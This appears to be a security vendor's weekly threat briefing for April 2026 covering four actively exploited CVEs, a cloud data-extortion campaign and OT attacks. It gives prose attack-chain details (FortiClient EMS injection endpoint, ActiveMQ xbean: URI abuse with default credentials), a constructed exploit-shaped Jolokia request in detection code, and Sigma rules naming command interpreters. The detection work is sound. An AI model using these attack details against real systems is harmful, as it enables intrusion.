
Weekly threat briefing: April 13–20, 2026

Apr 20, 2026 · 12 min read

The big picture: This week's threat landscape is defined by two things — a coordinated data extortion campaign from ShinyHunters that bypassed every perimeter defense by targeting cloud SaaS platforms, and four actively exploited CVEs added to CISA's Known Exploited Vulnerabilities catalog. If you run FortiClient EMS 7.4.4, Apache ActiveMQ, Adobe Acrobat, or on-prem SharePoint Server, stop reading and start patching.

Immediate action required: CVE-2026-21643 (FortiClient EMS) is a CVSS 9.8 unauthenticated SQL injection with confirmed exploitation in the wild since late March. If you had internet-exposed EMS on version 7.4.4, assume compromise and initiate investigation.

Critical vulnerabilities this week

Four vulnerabilities were added to the CISA KEV catalog between April 13 and 16. All four have confirmed exploitation in the wild and available patches.

| CVE | Product | CVSS | Type | Patch |
|---|---|---|---|---|
| CVE-2026-21643 | FortiClient EMS 7.4.4 | 9.8 | Unauth SQL injection → RCE | 7.4.5+ |
| CVE-2026-34197 | Apache ActiveMQ Classic | 8.8 | Jolokia API → remote code execution | 5.19.4 / 6.2.3 |
| CVE-2026-34621 | Adobe Acrobat Reader | Critical | Prototype pollution → arbitrary code exec | Emergency update |
| CVE-2026-32201 | Microsoft SharePoint Server | High | Spoofing via input validation bypass (0-day) | April Patch Tuesday |

The FortiClient EMS vulnerability deserves special attention. FortiClient EMS is the centralized management plane for all FortiClient endpoint agents. An attacker who compromises it doesn't just own one server — they own the management channel to every managed endpoint in the fleet. The SQL injection is unauthenticated, targeting /api/v1/init_consts via a crafted Site header. From there, it's xp_cmdshell to full system compromise.

The ActiveMQ vulnerability (CVE-2026-34197) is equally dangerous for a different reason: default credentials. The Jolokia JMX-HTTP bridge is enabled by default on port 8161, and a staggering number of deployments still run admin:admin. The attack chain is elegant — invoke addNetworkConnector with a malicious xbean: URI that points to an attacker-hosted Spring XML config. The broker eagerly instantiates beans from that XML before any validation occurs. One HTTP POST, and the attacker has a shell.
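The Sigma rule later in this briefing matches on substrings; the following added example (not from the original post or the ActiveMQ project) parses the Jolokia JSON request body instead, so that ordinary attribute reads do not fire and a bulk request cannot hide the exec call behind a benign read. The sample bodies are constructed and the xbean: URI host is a placeholder.

```python
import json
from typing import Any

# Shape of the CVE-2026-34197 chain on the wire: a Jolokia "exec" request for
# addNetworkConnector on the broker MBean whose argument is an xbean: URI.
SUSPICIOUS_OPERATION = "addNetworkConnector"
SUSPICIOUS_URI_SCHEME = "xbean:"


def _iter_requests(body: str) -> list:
    """Jolokia accepts one request object or a JSON array (bulk request)."""
    try:
        parsed = json.loads(body)
    except json.JSONDecodeError:
        return []
    return parsed if isinstance(parsed, list) else [parsed]


def find_addnetworkconnector_abuse(body: str) -> list[dict[str, Any]]:
    """One finding per request in the POST body that matches the exploit shape.

    Fires only on exec-type requests whose operation is addNetworkConnector
    (with or without a signature suffix) and whose first argument uses the
    xbean: scheme; 'read' requests against the same MBean are ignored.
    """
    findings = []
    for req in _iter_requests(body):
        if not isinstance(req, dict) or req.get("type") != "exec":
            continue
        operation = str(req.get("operation") or "").split("(")[0]
        if operation != SUSPICIOUS_OPERATION:
            continue
        args = req.get("arguments") or []
        if not isinstance(args, list):
            args = [args]
        uri = str(args[0]) if args else ""
        if uri.lower().startswith(SUSPICIOUS_URI_SCHEME):
            findings.append({"mbean": req.get("mbean"), "uri": uri})
    return findings


# Constructed sample bodies (not captured traffic); the URI host is a placeholder.
BENIGN_BODY = json.dumps({"type": "read", "attribute": "TotalConnectionsCount",
                          "mbean": "org.apache.activemq:type=Broker,brokerName=localhost"})
BULK_BODY = json.dumps([
    {"type": "read", "mbean": "java.lang:type=Memory", "attribute": "HeapMemoryUsage"},
    {"type": "exec", "mbean": "org.apache.activemq:type=Broker,brokerName=localhost",
     "operation": "addNetworkConnector(java.lang.String)",
     "arguments": ["xbean:http://placeholder.invalid/beans.xml"]},
])

if __name__ == "__main__":
    print(find_addnetworkconnector_abuse(BENIGN_BODY))  # []
    print(find_addnetworkconnector_abuse(BULK_BODY))    # one finding
```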

Breach spotlight: ShinyHunters and the cloud supply chain

ShinyHunters executed the most significant data extortion campaign of the month — and they didn't touch a single victim's network perimeter. Instead, they targeted the cloud platforms those organizations depend on: Snowflake data warehouses and Salesforce tenants.

The confirmed victims so far:

ShinyHunters operates a "pay or leak" model with public countdown timers. They've already set an April 21 deadline for new targets: Zara, Carnival, and 7-Eleven.

ShinyHunters didn't breach Rockstar directly. They breached Rockstar's analytics vendor. If your vendor can access your data, they are your perimeter.

The defensive gap here is fundamental: most organizations don't monitor third-party OAuth token grants, Salesforce Connected App activity, or Snowflake COPY INTO operations. The traditional SOC playbook — watch the firewall, watch the endpoints — is completely blind to this attack chain.

Threat actor activity

| Group | Type | Campaign | Targets |
|---|---|---|---|
| ShinyHunters | Data extortion | Snowflake/Salesforce supply chain | Gaming, education, HR, retail |
| Qilin | RaaS | Sub-24hr ransomware deployment | Manufacturing, construction |
| Iranian State (AA26-097A) | Nation-state | Rockwell Automation PLC exploitation | US critical infrastructure |
| Everest | Ransomware | Nissan automotive breach | Automotive, industrial |
| The Gentlemen | Emerging RaaS | Selective encryption + data theft | Financial services |

The CISA advisory AA26-097A on Iranian-affiliated PLC exploitation is worth reading in full. Federal agencies (FBI, NSA, EPA, DOE, and US Cyber Command) jointly warned of ongoing exploitation of internet-exposed Rockwell Automation/Allen-Bradley programmable logic controllers across water and energy sectors. Suspicious traffic has been observed on OT ports 44818, 2222, 102, and 502, primarily originating from overseas hosting providers. The advisory explicitly states that malicious activity has resulted in "disruptive effects on physical operations."
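A flow-level check for the exposure the advisory describes, added here as an example and not part of the advisory or the original post: any connection to the four OT ports from a source outside the engineering/HMI subnets is a finding. The allowlisted subnets and the flow records are constructed assumptions; the protocol names are what normally listens on each port.

```python
import ipaddress

# Ports named in AA26-097A and the industrial protocol normally behind each.
OT_PORTS = {
    44818: "EtherNet/IP (CIP explicit messaging)",
    2222: "EtherNet/IP (CIP implicit I/O)",
    102: "ISO-TSAP / Siemens S7",
    502: "Modbus/TCP",
}

# Assumption: the only subnets that may legitimately talk to the PLCs.
ALLOWED_SOURCES = [ipaddress.ip_network("10.50.0.0/16"),
                   ipaddress.ip_network("192.168.100.0/24")]

# Constructed flow records (src, dst, dst_port, proto); TEST-NET addresses
# stand in for external hosting-provider sources.
SAMPLE_FLOWS = [
    ("10.50.3.14", "10.60.1.20", 44818, "tcp"),
    ("203.0.113.77", "10.60.1.20", 44818, "tcp"),
    ("198.51.100.9", "10.60.1.21", 502, "tcp"),
    ("10.50.3.14", "10.60.1.22", 443, "tcp"),
    ("198.51.100.9", "10.60.1.21", 2222, "udp"),
]


def classify_flow(src, dst, dst_port, proto):
    """Return None when the flow needs no attention, otherwise a finding dict."""
    if dst_port not in OT_PORTS:
        return None
    src_ip = ipaddress.ip_address(src)
    if any(src_ip in net for net in ALLOWED_SOURCES):
        return None
    return {"src": src, "dst": dst, "port": dst_port, "proto": proto,
            "service": OT_PORTS[dst_port]}


def review_flows(flows):
    """Run classify_flow over a batch and keep only the findings."""
    return [f for f in (classify_flow(*flow) for flow in flows) if f]


if __name__ == "__main__":
    for finding in review_flows(SAMPLE_FLOWS):
        print(f"{finding['src']} -> {finding['dst']}:{finding['port']} "
              f"({finding['service']}) from non-allowlisted source")
```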

TTP trends

The dominant initial access technique this week is T1190 (exploit public-facing application), appearing in five of the nine incidents we tracked. But the more interesting signal is the rise of T1199 (trusted relationship) — three incidents involved compromising a vendor to reach the actual target.

On the collection side, T1530 (data from cloud storage objects) appeared in four incidents. Attackers aren't dropping RATs and exfiltrating via C2 channels anymore. They're using the victim's own cloud APIs to export data in bulk — Salesforce query/queryMore pagination, Snowflake COPY INTO statements. This looks like legitimate traffic to most security stacks.
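For the Snowflake half of the gap described here and in the breach spotlight above, the following added example (not from the original post or from Snowflake) separates the load form of COPY INTO (into a table) from the unload form (to a stage or cloud URL) and aggregates unloaded rows per user. The rows are constructed in the shape of QUERY_HISTORY columns; only USER_NAME, QUERY_TEXT and ROWS_UNLOADED are assumed.

```python
import re
from collections import defaultdict

# COPY INTO <table> loads data; COPY INTO @stage or a cloud URL unloads it.
# Only the unload form moves data out of the warehouse.
UNLOAD_RE = re.compile(
    r"\bCOPY\s+INTO\s+(?P<target>@\S+|'(?:s3|azure|gcs)://[^']*')",
    re.IGNORECASE)

# Constructed rows (not real query history); bucket names are placeholders.
SAMPLE_QUERY_HISTORY = [
    {"USER_NAME": "ETL_SVC", "ROWS_UNLOADED": 0,
     "QUERY_TEXT": "COPY INTO raw.events FROM @ingest_stage"},
    {"USER_NAME": "ANALYST1", "ROWS_UNLOADED": 0,
     "QUERY_TEXT": "SELECT count(*) FROM crm.contacts"},
    {"USER_NAME": "ANALYST1", "ROWS_UNLOADED": 4_800_000,
     "QUERY_TEXT": "COPY INTO @my_ext_stage/dump/ FROM (SELECT * FROM crm.contacts)"},
    {"USER_NAME": "ANALYST1", "ROWS_UNLOADED": 120_000,
     "QUERY_TEXT": "copy into 's3://placeholder-bucket/out/' from hr.employees"},
    {"USER_NAME": "REPORTING", "ROWS_UNLOADED": 900,
     "QUERY_TEXT": "COPY INTO @reports/daily FROM (SELECT * FROM fin.summary)"},
]


def unload_queries(rows):
    """Yield (user, unload target, rows unloaded) for every unload-form COPY INTO."""
    for row in rows:
        match = UNLOAD_RE.search(row["QUERY_TEXT"])
        if match:
            yield row["USER_NAME"], match.group("target"), row["ROWS_UNLOADED"]


def flag_bulk_unloads(rows, row_threshold=1_000_000):
    """Sum unloaded rows per user and return those at or above the threshold.

    The threshold is a tuning knob: set it from each role's normal unload volume.
    """
    per_user = defaultdict(lambda: {"rows": 0, "targets": []})
    for user, target, n in unload_queries(rows):
        per_user[user]["rows"] += n
        per_user[user]["targets"].append(target)
    return {u: v for u, v in per_user.items() if v["rows"] >= row_threshold}


if __name__ == "__main__":
    for user, detail in flag_bulk_unloads(SAMPLE_QUERY_HISTORY).items():
        print(user, detail["rows"], detail["targets"])
```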

The ransomware landscape continues its shift toward pure data extortion (T1657). Encryption is noisy — it triggers endpoint detection, it creates operational disruption that forces an immediate response. Quiet data theft followed by an extortion demand gives the attacker leverage without the detection risk.

Detection opportunities

Here are three rules you can deploy today. They are written in Sigma format and can be converted for Elastic, Splunk, and Microsoft Sentinel with the standard Sigma converters.

1. ActiveMQ Jolokia exploitation (CVE-2026-34197)

title: Apache ActiveMQ Jolokia RCE attempt
id: a7b3c4d5-e6f7-4a8b-9c0d-1e2f3a4b5c6d
status: experimental
logsource:
  category: webserver
detection:
  selection_url:
    cs-uri-stem|contains: '/api/jolokia'
  selection_method:
    cs-method: 'POST'
  selection_body:
    cs-body|contains|all:
      - 'addNetworkConnector'
      - 'xbean:'
  condition: selection_url and selection_method and selection_body
level: critical
tags:
  - attack.t1190
  - cve.2026.34197

2. FortiClient EMS SQL injection (CVE-2026-21643)

title: FortiClient EMS process spawning command interpreter
id: d0e6f7a8-b9c0-4d1e-2f3a-4b5c6d7e8f9a
status: experimental
logsource:
  category: process_creation
  product: windows
detection:
  selection_parent:
    ParentImage|endswith: '\FCTDas.exe'
  selection_child:
    Image|endswith:
      - '\cmd.exe'
      - '\powershell.exe'
      - '\whoami.exe'
  condition: selection_parent and selection_child
level: critical
tags:
  - attack.t1059.001
  - cve.2026.21643

3. Adobe Acrobat spawning suspicious child process (CVE-2026-34621)

title: Acrobat Reader spawning command interpreter
id: f2a8b9c0-d1e2-4f3a-4b5c-6d7e8f9a0b1c
status: experimental
logsource:
  category: process_creation
  product: windows
detection:
  selection_parent:
    ParentImage|endswith:
      - '\AcroRd32.exe'
      - '\Acrobat.exe'
  selection_child:
    Image|endswith:
      - '\cmd.exe'
      - '\powershell.exe'
      - '\mshta.exe'
      - '\certutil.exe'
  condition: selection_parent and selection_child
level: critical
tags:
  - attack.t1203
  - cve.2026.34621

The week ahead

Three things to watch:

These threats move in microseconds. So does n0limit.

Continuous investigation across every alert, every vendor integration, every cloud API call. No coverage gaps. No overnight blind spots.
